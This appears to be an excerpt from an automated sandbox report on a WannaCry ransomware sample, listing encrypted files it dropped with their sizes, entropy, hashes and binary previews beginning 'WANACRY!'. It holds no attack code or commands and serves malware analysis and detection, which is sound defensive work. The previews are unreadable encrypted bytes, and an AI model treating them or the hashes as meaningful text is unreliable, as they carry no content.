                                                  Preview:WANACRY!.....V....j..E2.tA.t..bn..h.-.....d.../}.c=3...k..3...{.@.K.+... ...FJo..^[[...}]@.4.T...J....2.H...w.(p.....\ ..\I.3.7.K`..v.whP...6.HCZ.T4..:.....I^.0..T.md...gD...2....opls.."..a.1...<....F.M].t...[!.W>.V..p7....5..ft`1....ae7....{..;'~.H...Eq..................g[.......[vs.2).@...<.a.....8.3..>....a.e"B.].="...`.w.!.I."..8y..5...T_kn..m=g.......".....U.Y1*.S0..`./.......L..8e.....@......l.").-AW...>.9..mG-.2..k.....T.J~...%._...;..c=..T...G._W..D^..... C..Ykw..("..qf:.....>...._.^m...t..Fk_...{.....q..D..Y.E..2.K.2....).h.......r......B....."..A.......N.r?...r..hF...kb*......BE.b..7)"j~>c.h.B....].du..6}..WnD.KV.......Qj.#:{.....ZG..-....)..1W"......|x.1.e}...S....gG|.n.Xa...TC.zz...|>..C..v..DT..,a.H6...3...e...n.+.JwY<.....\+w2.. ...c*'......=;..=.=x.2..~..r...8....2J.-.*.eb...x.`9M..XLq...CFx9......E*8M~....).h...1.....(.G..\.X.V.....c.@=..E.F..YV....S.9.......}..F...,..k.....v..."K3......!....iN..7.^W.%.....G.&.?....

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BNAGMGSPLO.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.857904470184713
                                                  Encrypted:false
                                                  SSDEEP:24:bkXn7xZ0Ad7xV1jkKawlR5cj4Pc3b+IwynbiJwugWJIWeLvVAKL8f1:bk37xWEV1le4Pc+WbvrsqrVjLo1
                                                  MD5:01458964CEF4986DEBF42AF943035EB8
                                                  SHA1:87F76042C2EC1DB94F0F1CB4A096777EFCFA32E8
                                                  SHA-256:E24CE91EC3B691E2769C9DF97B7FC2608C03934FDA5CFE000CCC7CD18F39B728
                                                  SHA-512:6637DDDFF48AB09002C4B641041143EE2002D0C962930E66A1D7BD1915B5A131A5F4FFA9AAA1CEC0FC0E8F466C8C56585B6D9387874493716D4EDBB43F33CB25
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....+YA..`...Y..T...y.R..;S..,B...."...).w.+.O....X7.M.QY.v...1[$.T.......j.~.....?Y...U........J...W.n.Ab......KaC.....wE.l.o..{'..r.[w....s`...K[.1.l#.tM....$...g...u...~8.z.2.q.....s..p.F.!....4....f?.Q8..........a[..`....p....y.V!>.t..Gl..l....'.H............e....a..@..........]..I....>.%%...\U+.Z.X......2..%..J5..|..._c"...!..?.T..O..G../....:A/.o..1;ZB..)W....G..u.W...\hV.J......s..<...Z..:_{.A.-Q..`CP......Hg(9^o...K..}$..n.nu..).]*+'P,..2.W......P...X;@.......Y........Y..b..b.?...K.N.=3=...T4...H?..dl..^{...v.U..:..=(.H.R.`t&Tm.......G...<w.Q..[+.. 8p..N.....Q.v[......pt./.l..j.Op..Q..9.h...D"..F.P.....u..l.#.`....$..x....._..%..3.PF..D3..k.K..V\...D........E..\..e[.lg......?..~B.....z.1.GZ......z61......"..Z.F..A..^..U.&..9..C..g.$.......s.~..=Y]../pJ..b...{...6..w.T..:.;!.!;.N.._.j........S........*|.~.#v..0.Y..@....d2.{.&...........$$y...f&I..bB........]..Td.....<.Z..%..[.....q.[.p.2.M..+W6m.....6..[..xA..ycx..N.OB.,V....+</.

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\BNAGMGSPLO.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.876329322149963
                                                  Encrypted:false
                                                  SSDEEP:24:bkkIbQ8k1oICwZeLo0/YxqrAWB2M5nB3ZVtMlEgMfioTLvTO0zBoaV3Ckfkt5mur:bkH2KICwiolQAWB2M5BJVYmfiWO0zBo3
                                                  MD5:C18D3E4282D1EAE5099745210978B5F0
                                                  SHA1:C3FBE7556D9EBCB202A71C180FBEDB4862E970A5
                                                  SHA-256:51AD103B5AE50549F4C8E810D64FFAE70048144530628B8EF7DC86F34C8C5F16
                                                  SHA-512:4D2A0DF1D0C116DF28414DC25DE1444B49241FC1C6F130DDDB1250512608364B58C748C5CCF877490DE0E5A001A5897931324DD56CFC6E128FBC52D8C0E91A39
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....._.5..}.kG.I....!..a...Y.........*f....\.....9......s.<%..r. ..[}#W.J.c4.J'.(q....i.H...v..w..5.\g....b.c1..._...6....cHQcu...w.t.W!...^.%...'.t.zJ.>.BNn.{....q0.nm...Zm.o..u..9g>v._..Y....@,C.=..Vj-..P.Q.W..?..|-.i....{..m...|:u......;................K.S.2.JW.gE ...OR.kRRB.Xd....A.I#Y.....c..y.p.*..^H_#rj....3......#..0m...h..bU.\..O.w8.......%.a.....*...5.x...[...B.....D.X/..(.J..E....@\....*..m.....B.....Ig..3.....K.h......s.....{pdd...a..........5.}....9\.....+....y.e.a.2~......5.T.)...Y.GEU........#.f.._......R......!?1X..FT....m.....?~..s.t....l.......?.l........#a.....".....K....).#....g..6....>..(.......Yl..~.v!]...k.....:k=.iz.8.j.u@..N..ka..0b..E...Vv.a.j~q.R.....X"|......O.v.,D=..]g.Q.......-.#l(..I..7......;y...f.M...%N.=.....n.6.t.......pnPY.....;...*2.=i.]./p..c.8&..WX&...X.:.+...p^.bj.W......>.e`.|.....6k.1-..3@.7.?.j.Z...Rf$..E..Eg.u..S&.4ls....QM.v.....{....Yp........w(.1O,.O..ZhT.8...Z.......

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EFGRWFCUWS.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8490804436733015
                                                  Encrypted:false
                                                  SSDEEP:24:bkijrdPDW6uS3J6NUxdYn42kz1syIZAWMYSxfw/w9gWCcrR56GQ2vbeFuQxMdT1F:bkEJ7W6uS3JfvS4n1vsADYSpwI9gWCoz
                                                  MD5:0912848A8EC8E4FCFE23EC0A39A39076
                                                  SHA1:D26D4EF538CA5D418BCB085C79F5DA2B7C122F1E
                                                  SHA-256:4F5FF33C191D2399D77D0F11F314F83E28230A51A143C37A566F1C1E1F3C67DF
                                                  SHA-512:F353CE89AA50A9CF23FC55D81F13277201D3562AE39FC1E968B95FFBA0406EE6850C020B245B068F9E30F9412135A08D04F9FC11F9C01EFECDA6B74BD4807DC9
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....D...6.=.).q...oBo..@.r.....A.,.g..&.?....Ucy<..5G..1...n>F..^...O..&3.....G..&..X..1.:C...X...H.I.qTX..s..wmsg.@.`'..L...*,.N.....U..rX.....t..>..}..j.zU...+.......N}HB.\.i.....x.'.T..b..'.[D.b...2....x.'....x.....8S.k..iP......P0.u.Q.>P................f....v.....06..I..A.....F..122..Z.ly.K^.S.r.y......c......T..5n.E8U.....f...<,...n....S.F./>z.3.(2...rQ..I.Kc....D.....R..?.3.U.Lt.uk4.....l..Ez.5.<.n.....z.F;.gn.~&l....(.S.s.f%e.Eo.[..>..c....R..(.Q...7..c8....M...e.O..IH%...o.g..7....\...Q../B.y].!l.vn...Z}.G....!.kE............O',..}.q..Eg^`%.m....)o=7Wo...53.r."T..8.ID.bN....e.T..G...Z j.].....2=S.9'..Ri....b[...5s..c.v...h..c.g......33..........(.l5^.t...-o.l.(..K.z........~x.=..+_..o.;.1..j..@..6.L.T..Q........N>.~....E...I..PI........... k...6...(.UH......s...6...6R..O...EJw.b...t.%...\.:n.p............}..d..m].....LP9....w...I....".bb\.@.-.M...0.g3z=>u....{\....w\..At.{,ZC.*J.X.G..:40..8.....n...<...w%&^U;.}.9Lk.

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EOWRVPQCCS.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.833933403557597
                                                  Encrypted:false
                                                  SSDEEP:24:bkFIMVk4uyJw8PFqwNzCQkfN2POUuDhSVadgLCjII7PXuXZHN0jZGQ/RF:bkFIqk4DL9qwPzPOhhSUd1IIDXu7Mx
                                                  MD5:5F1CDF029ED0D7EF9B00362641F078CD
                                                  SHA1:996C243299659FBBBA80EE85FEDD3DBECEB1223A
                                                  SHA-256:ED0529FD9DC8C0CD489038D42F8F174ADBDACB000DBA6BD4C16FCC016FFF125C
                                                  SHA-512:772AF2D08C1676EFE93736ADAD5FF84E5376B4073539D1EC3BD06EEE652251124F154CDC82A6A1FE69FDA5919C9A0F1E9AE26FFCFBC1B75711F47DBCC7FC4A54
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....6....z....f...y...EM0x...r..1..C"R.@.m..[_.b....Wn.#..Zj.... .....L..... [%>>{H..../..pq......i..2 .S..R..#E.@k..9.29..1 R..K...9l..V.A.....:..Wc..O...<.3......(DU..9o.3}.(..2.."1.*.H..c..35.J.r./3S...%.y(..u;.>}....5+...8.....Y.....%..%..6.E...............~e..........R.............h.s....$c.........Y.......0|...SM...k.....I.uaN.S..@ ..!....{S.5.Z..i.;.S,[...yQ.*.}.+..W.B....C..?...g4.....&..N..#.....}r...i'x|.!Q@I<z\ ...Sk..37......`..OT....k..<.k......K..-..b8.(..a.....\.7x...3......B.u..j.n_..EO>..JvPW..ll.......H.n.../.iF...7...L....D...b.X.gB.D..Rd...{.y....n...];...A..#....$..6T.......Q>..r...;..!kZ.K...7.z.:(.o.....|.m.......4*.....Y..C+..1...h...:V.j.:5~58 .........-.:'..EgH.t".iE..|1.IW.[....e.....).*m..g.M.....`.N..0s(.}.......=.{j{K....p.1\.O..%..T....n...Y.S.W.-.{.@#I..J.f*......xT.!?.R....4.j_.v+A.....I.92GS...o.E....FG.....pm.5....|.d[..3......j....e.4..p%............DU.........nY..7..a.......4/E..+......x.s:0o

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EOWRVPQCCS.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.837042601367274
                                                  Encrypted:false
                                                  SSDEEP:24:bk6nd1wWuhKGg7TLghpGdDImfsUHpGa5Ib8Gsg49W4T:bk6nEWuwypGdDIL4GoIYGs5nT
                                                  MD5:14F05F7944A6FFD3594BE3A6BAF30827
                                                  SHA1:68428DEEC4789D0BE3754CA5B9460AA0D57FFF98
                                                  SHA-256:D3EF71F16796BAC56AA733571CBC381FDB8029D315F55DE2201E7D8C1D44C1F6
                                                  SHA-512:EA6986D4743D93E58DB3E64DA1EFBB3B065BDF3B65196EAD23F337B36791D97840832542487B3FBCFB553977B835063B60D10924AB16E73B455CFE7131948E1D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......r.....d... .*.h..Www]b.@S.?..$Y.8.x...N.....Z.!^...m=V..` .*...H....[6o....5`..U_A.K}........3.......^....$.).,.-....9..v..,.GU.c38-HJ'b$..#..cF...o......5....?..g.zZX.]....7P.}.t.)b.B{...S.*...GG.x... .Cx^)+D.%..)m}...!.T..V......,.._....x.N............dh.B.FZW........R.a.s....Y...P.V.@u...2\J..a..4...0.c.......Z2...s.p..._x*.[../z....W...:H......3......\./J<.V......Jz.z1a.2mr...U../....I^..0.Y.....W.\..T.Ye.<...!.%mE..YE...}~|E...,....!..El..F/.../...7. )0c.Ni..o....&..4v".o.6.Z...4.J.ax.=.A>..V.....i.PW....'v.._..g.......?..>L.x. .-!4 ....<h..wMH...ir.pK58.....[..8[......[...9.3..J.[.*.<...m....~`..A.z.M..F..":.aL..g...G...c.....b.....Tqm'o..5U.....l.^.....M...._.{u!..'K.7.O.p..F].n..U...~H}.I.x..l...N.9.*...9rCh.......F....yc........T...v.L{-] l....C.N.......W.e..J..u...5z9....1.....M.}..m....T..}..L=..G3=...D...-#.Z.i;.b. ..oJ.D....B...c.l...>..*..#.!.....b....&....a.tN.>.B.n.........+.O........]#..).....4...06Y..a.Z.

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\EOWRVPQCCS.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.84403982408391
                                                  Encrypted:false
                                                  SSDEEP:24:bkhPO434FHXO9ucxngY+oNI6t5pT1hbM3L9jeN2fE/mZGh/BAfBLTwa9:bkhPO4GXOccxgHoFx1hob953kh/B20O
                                                  MD5:6D170AC6673840205D713A35FB6EABE1
                                                  SHA1:9DC6E03C127224084797D532AD28EA1FD4E82757
                                                  SHA-256:1CB535883E423103E9F271F7EF3488737E5FC9BC6FF8383E1385C7E202D9BF83
                                                  SHA-512:F88E665DEAB899B348E3F4699623F44F9FC0D47DE2E8339C4FC2FF539BD0E9FA1E4FDC3E90CA30F8C4B3457457F7C02F1204AA93244208F3B009F4AE8EDF6910
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....^..(...C@.Q.C.j.-kh..T..U.Z...v3.%si!..s...X...}I..<U..C.c...(.........Mw.B.......x).9j...YU.l}gKea.G..m....(I...B?X....pm..e....eK{..%M.n...4`!..(....]..k.(2h....2.....(id7... !vV.......Y9..U)..Ag....G.....#..e....Y...)..r,......c&74.!.(.....jt............9S.U.....ews.U.;.....{[..d.V..S..RS.@.V....me....(....t.|.R.m.k........6. 8[\........)lH.)..6!k.]..,.GI......5....L.[....BB.o.0-N..T.+.B.m.........#..>/.'.9..P.4..H=...?.8gt.$..N....-......!19n>Su..]}K6...F..-;!=......4,.e......s..K..7...........B[..U+,..L..w.6.G...-l.k....P.5...6D.,.o#.?.w..Vl..M.../hX2....rN+....-..<an._.$.."..@....zUmD=.tp..d.._$i...~...:-..L....=...J....O......X..?..o.h..9...z.B.....&.......A8bX-UW*u..U.c!....W.@>........Xf..S/..r...%..h...N.....E..7:m...?`(.gl.zY.JY......Q*...N.M^...Rmp.8.nw9..7...I..)-.........[XPq...Q.N.kk.f...^.s....$Ag..."..(..(.....34..)..E....<A..C..a......D.X...C[Z..0.'.Y.h+..s....W....d...R[._H..3.+.'~....a0.9.x@..?.Fc..=Z...

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GAOBCVIQIJ.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.83031464283867
                                                  Encrypted:false
                                                  SSDEEP:24:bkS3Ir8eZZihIE4+Us4E0qCz4nzHxtW0XJZ6YMzH4MVyDA34LWhJm4l+7sUMkbCN:bkqPPA4nzHx/D6hzH4O25LAJvl+7sUMx
                                                  MD5:EE06AD80636DC54FA88F36B008391FEA
                                                  SHA1:5AF4D0862BD485C720B9B33B0F71E9E9D98858F3
                                                  SHA-256:BCC0476D3FC829A308BD148E1E752CEEA33A9F63D1FCA16FF4ECBFB3C41B783D
                                                  SHA-512:6913FCBCD8B10A4FA213B1342542B37BF46280DBDA7E9611D20410173B076D88F703A5D14A20D7662628D3C722F44A378923F12C7364CBC241533D473E787971
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....X..VyEp.>...S.s.?..zn.If.S........K.F.:swC{.q..N..g t[.1G.[.DYa(..Ti..%&i(......N...U!.Z..1s..v..._....6.q..x...;...V.'[.L..+a....;.%EF.;Y<...R".....6..V...!0..:.....0...w...'....g......>.G.*.G...Q..].....&..x>"-....f1.... .g....)%....5.87...............#4@....b;...I..r..K)...\.V.&".R...)....j.*..R^P......=..*.)..(.TG.<[.cDF.G@.u.~)gdB"c._$V..._Il........2.}./)..;!x~]....<I/.\...L.......Qp...n..a5B.6.7R.A}SI!._.[.u.. :.z?..E....X....N"...EsfJ.=..u..`.r5C&...RZ.Y.S.4.w.^..0..!]........T.X...obzSOp.s....A.M{......b.............-....2m.,.....L9....2.2...k........C..7f......%.j.Fr....[..,.....'.~...-...+.W.~g.s..\..h...nh7....v..v.sRt...S~..|. 0....(..&|9..T.ff..o......K.....Y.a+..\).].).|..B..a..l.{@.#.@..%#..U...t..:.../&.....rp.Z..O..i.+..#.....xMM..zY.. ....#jCR...R6I.w.Xf..._.M...,.fQ.t......]./.pl........v.}..g_.]..-FZ1.|R.....S..6...eI]b.</+f]Zb......hvAU.A.7...{...;l.;@\."....bTFP6..\..]{........;.....!1r.|...A.*.

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GAOBCVIQIJ.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.848796345452971
                                                  Encrypted:false
                                                  SSDEEP:24:bkGNZsTY6/8HQDoi/gVzpfy6jar9PyvCRYwfpGkKCPjSbtl6oaU5B9F12EGUriT:bkGfsf82gVzNYPyqJfoaPsaYOnP
                                                  MD5:C60E19F38602554FB58E3A0F7F737DFD
                                                  SHA1:ACB275B4EAAA2DBDF74D9AEFE4DDE63EE9D9FDBF
                                                  SHA-256:1917306234433A3C80750C54B4305D3E17209F8FD53681CF24915B19DE515BFB
                                                  SHA-512:628938EE661A72915EC49B382DF85F734BE5B707CA79B6D83795B1B5F6711242ACD0B9A6C332A1CCBF6C577D86E29FF51F2D40A4AADC8DBE2D9311BBE20D409C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........m%.^..........k4..QU...3..l.7Z..O....^AO..e...@#..^6....VI...-.+.y.B......".Wk....4...;wd.....c.......x ..(.T.....F..t"jS....e!...k{......j.+rG..X...U.4...]...*5.....2.}......^_Z.......}..=a..n...<.^rg.[..6B.ZU4o......cd.@2........P..:.;.s............^/3..-T.(+.>...q........co...[.~...6....-.'..m.}.*.$..?6#$..xc.....O._8...`.. 3........b...3..[..l...RB..K6.$...k....>..h]-.9.C..$.....s..I.......\.-..A.3.E....'.9.....'.g..B.....R.e.......{0..,H~@s.*..__c.o..$S....6....FM.`...v$....p.6..UA.+....h.j.....(.ZY.t.P>P.W!...nr..y...LeX...d...vZ..v...#.q.I.6$Z@...tH..#h......}A....v......_...W:.g.#U.w@bkc.C...D.F.....SA.{c..<.l.7.l..!..%*...\..)-oB..n..{y..NI.(Gr1.............Ay.).}.kG6.jWlBV}.n-r..2w.U$....1..bs.6W......K_C..Y}..2..lAr.;._)..(...K9....o.x#F..E.S....nG..w.. 3...Z.g./..u=..........$].#F....n:w...........nV'.QAj....jl.gT.W...._.#...Z.}..9../..0..kh.E..kbA^4.nY.t&.!{..I..^....<G...1>......$....w.bi....x.-.g..{S.T'.4...

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\JUAQUZZINZ.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.833576816139003
                                                  Encrypted:false
                                                  SSDEEP:24:bkBAZab/Tp6kg/jZNOykuYLGmbmrr2g2Cj/UoaJKs2M/KT4F:bkF/FW/jZNiuJmbmrhrUPh2s82
                                                  MD5:0B55E0FB4D2027256A4F179C5D8079D1
                                                  SHA1:FAB31C04564A32B55AE99EA440641EB0ABF5288C
                                                  SHA-256:6E74F4907C9B894FE24E19864565DA144BA953C45D9450AEFB7918CDDA259C5A
                                                  SHA-512:3A08CF10616B38E7D27CA5830FD2C768271C76105BB3FAA8C0DC187A9BC136E566FCFFDB5AEB44BBEFF67A6F9C5EBB59B3F2DE31D0A86C9763D7C266493633A7
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........AD...c...y....[{=...W....\..}|.t...../......k.-/......v....._K.l....i...bef!&.S..g..I..'.....'.$dI.k&..Ya'.&.#.x.)h..W."n.....8.....<..........b..m...9c..(3Od........9.....%..d.dz..r.'L.....g.G..g.c....A.r....c.....C.q6...PJ....R...*..u...............q..~.v_&..l!v..9...{....7\..`x(..+..$^y...4..dv.b{.....x..D..hN.Q#..T."+| F....([...UyG.=_.C..,?.8/..e..uI.F.......G.)...7..p..b...F.M1s".W._..Xq.N.[Ok...V.....~-u....l.?!..N0..t..c..S.*J<g.:%....(.....Er^. ...y..uT....fBh..e.h....o..z(O.u....S.;hi=.)..>.C...5M.e.GL<*W..<...W.....c1F...."...K-t..Ua.A...!.E=#....2AOp...8p7..Y.N...L^Bq:6..y.|..0Gg.+.O..@.......i/....^1S..3.5.+,,..b.#....2.|M*.h.-.).ng..M..l...%...L.....#...J..O...3..|g.#U....Nqs.{.....~.... A.?q!..j..2....M..98(y...P..p.....?..}=...G.s........"...`l;...guh. :n,,.E@.U0'......zt2.q...y...n5.....>...}y.<..{......n0:.cG.o:=..g.s..m.Q.L.x;..L...v...\.W.7..s.i.%.<w.>.d.&\..Ou...du...ZQ4*.....O..&....N..+.[.....q.#...J&t

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\LSBIHQFDVT.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.872777853650534
                                                  Encrypted:false
                                                  SSDEEP:24:bk++Cr/L0XbZiKRRG6cux5/SNJUQZ+K5jkgTeOvuSzKvpF2vypJ934Pthwv:bkE/YXbbHGjY2SK5ogTYDj2eJ934Fmv
                                                  MD5:7152C96B696C458BB8CC07C4C139DA7E
                                                  SHA1:B9C9B1B3DA050259CB03670D4DC414C4FE881AC6
                                                  SHA-256:B03574312B8506121FB559636B5EFE09A9B64B08E570D236A16E4EE6422E84F8
                                                  SHA-512:D1E7A8994FB84B84E259BC98C465CC19B565364D958CB5DCA209B0A1EA6C98D5231E447FDBC8ADA9C4F7243D3E005D4492501CA4F0C2BC39E26C3B2ADA5DA555
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....tv.6.~..M...vJ.7(J^B.}..B..?.#..w.=...h<....;...k..G.&Z.u...gQa.q1.G....(A.....~...i.s=.V...TzQ,l.8U.b`....O..P..l.:....2..Jr.-....Q...g...).4>.u.=q.eo.....N.b.l....5^=........q...3.s._...6..9..^_.y...Q]....cN...1..bV.+...f....M..*.'..;..<.D............@g.....(E.,'..\..9.p.....Y..1|?...b........i:....sx..g@3.uh...........|j....,y~r`......6. X.nZj.E...]rW.Q......Z.`.<.<.*df..."yZF. ....b.....s&Y#...P<...g.._.UY....5I........;2...8*.E.x..\((.KOR+z.1R..%Vy,.`X..8!.h.....5....X..e...{m.O...L.........'A>.......g..sWa..O.sA......r.7M....z......>p.*.6W.{.m#t.#..kC..#..>.q_.m,.q`....NF.t.t....W@IW.........AJZ..9.-...u[_...V..Q.'.qQ.[.&..g[R.fu...[^@e.....r.-oG..5...K_ <Fu..@!.,...9.#..T...k.H."..}..a...t3.T.G..M.@..-.&@..w...V..>.c.H..+.:...H..4..7....*....@..3.CF.F.Fh+4r[.....qm..y.*U0..#.LCX.x.2...V.>.z..0....#.W.2...9+..Z.L..<|....o.N....h.k.|Q..=]C..1..{..\....B.`...S$..6.Z*{$x..........d..4....QS..a...3I.?.Kc&..Z.]$0e.C..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NIRMEKAMZH.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.821457853377928
                                                  Encrypted:false
                                                  SSDEEP:24:bkCme80jEghn98/44cdCm+CD0YKzOHuhn0oZsGg9I1zPpJLw8kzijuz:bkCK0Jhu/44cdOCD07+uhnG8pJLjkziA
                                                  MD5:B2B6A9DC3E1BBFE28E9CCD286204149D
                                                  SHA1:D457BCC0CD9192CDE7B82F923970C13FA38797EB
                                                  SHA-256:CDB36855E81240C6E5121FCCA828C879BCF15994A658D17167D64DBB68D33101
                                                  SHA-512:4D96B22BB81180395A732B5A6E293677188B3EB1C1D191D07B1BD7C3ECF10A558BEBDCD13EACCD486035EB7DF25033739F74340F9D1EA9D3B7F703A1E547A2BE
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!........'.z5$.).8.;..h..T.@.F...{.US..~......l..]...&...n..N.".....c....a!lW.....>..._t+.!1...j.?)[.-....u@.+..$.`Y.F>..ubI..[..t:<W..Oa ...a.8....}3^.!UdA>9..."..m2'4;..CP&i...0N..j....9k.@J...*...4/:.x-M...]..`.....a..u#..A..q..T.........o.z.............wB4v.O..h.....R......U..`{..?...M..m.Z....^...d......Z.7...Fi.[Z......q...#..B....#.p.x.tt0..m..P.....%q..PN........P@=..e.!H5_.J!.#.Ft...dw8..(.q..z.FY`...xtBu[$.Vku..;M....&.E.~=.r..ic..o+...\.D2..+X.".t..C....Et6....\..s....+..[`...R0.d'.l.Q.>?...).H..)pa...]....`....q){. ....{.(G..HV..X.d.....N8w.J...:...7..,...D.-.W.r.s.....X.?N>m`...Hw..C.....e&q......-\..Z.zt-[....~.{V.q..4;.`..0_..5..H.|.n...._.i.&...y.I.............%?r...:....Q.........3SpX}Y....R....k..5!^\.p.8.........v.8c.<.T5..No...fX...7.?5.4.....m..H..~....`b..B.M=^,..i.....(.h..`.[]o.&...W....._W@G.[.B....YN.8....P..{P}?QR(....&.F.] ..,....oq...~.u0....w.M.. ....@$.N....S.,.|..2Z..r..+..p...".2Q...B.(]J......*..

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NVWZAPQSQL.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.845346345377583
                                                  Encrypted:false
                                                  SSDEEP:24:bk9bnzjfYHiuheh6SQDTu14ea39vbZk9Y5dhs46MkasJzghCDkNQL6qgqJMT6pPI:bkx8iCehaP3eWvV0YVs592iRLBzJM91h
                                                  MD5:8A2B2DF71862270A3DDA218F861309C0
                                                  SHA1:D92E7416D8B15512D0D2EE06A53F70E547C579FE
                                                  SHA-256:9F0694B5BABBBBB0BB1DE10C633540B6FFC36950D8BDF46D6BC062534D7498BB
                                                  SHA-512:0DD4F52924EF57D7F09CAF325F507CFDCCCE55CAA70062E6762A0FC5AC427B2B513328F1B7D2412E23D9AA671A13B8E1EDD32A1E86F5945A9BACFEFACF69C5AB
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....U.2.h8.B.7.Q......nYk0.....!{."r..HT...6T..`.h..v@.*...[.$n......~..+....A../......3.C...W..Db.K/9.J.........l...^T~.RC#Jx.....3.9f...].y5..Fw.....|+./$+......-...a........2o.c.p..;...."...o..........h..|E.J...j. |....0(..........5P..gAAt...............Z,...L......t.r..?.....a.84...T.*.w?.Q.......(8..,..7.c...,f.1}.X..*....h....B.-...*..T<..z.......6e..g..t...e......0...h..B>...,.W!..r+..".....6@...{+....?p...'.-(.P.....A....I}..........6T......(.?....Kz.....@W$..M......L...).0.g.Xb.T...W[.#'r..I....aF..Kf........>...z.4F....V..,r..3m.-1.V[.....X...J|.(......I...... ...+.).]>.n,..2......I.Y..V....X..r..y.).(..N"k...P......7.o"..x..^-.=.=+R.(..'...7..+w\.*nR.qK.R....km...2....Q(0.y_,.N.UvS..GH.*o.....P..|.......Ag)G.W$1........{s8.9.N..!..!.....aG....(=..g\.k).U.j.D2...$..m)..3......r.b&.\..'T..$m.._go..vt...9..,..@...K..xW=.<......R.|..i?..5/...Q.HK.(......UG..S...Ar9C.7...n&...k..E..`F.Q...ioh.J...[.......jP.@?.....r.-3`.

                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NVWZAPQSQL.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.865382498226164
                                                  Encrypted:false
                                                  SSDEEP:24:bkyKcI4qXK7xnDgq8ChLnnGtGYOV8YELcMHl1S9K8nPu2k8eiATviHKTc1v8VFpB:bkyKcIvXKNnDgq3LGYV8HcMFMI2wmHIf
                                                  MD5:B9573DB2AC298F4D1514D6B840D29590
                                                  SHA1:49401520D85A142BD6111F52B086F43DCDCD45D4
                                                  SHA-256:46D112C2CFD38AD2A05767087896DE6128EC57705D33ECE7AD9FD4D279EC980D
                                                  SHA-512:2B7B39D692F402348E85B86D549DC8B0DE351B3D29DED455737F69C4135F35D65AD5D931A2322124D3233BF74165B03FF4C9FF7CEA8C878D4CB8D658BF72F439
                                                  Malicious:false
                                                  Reputation:unknown
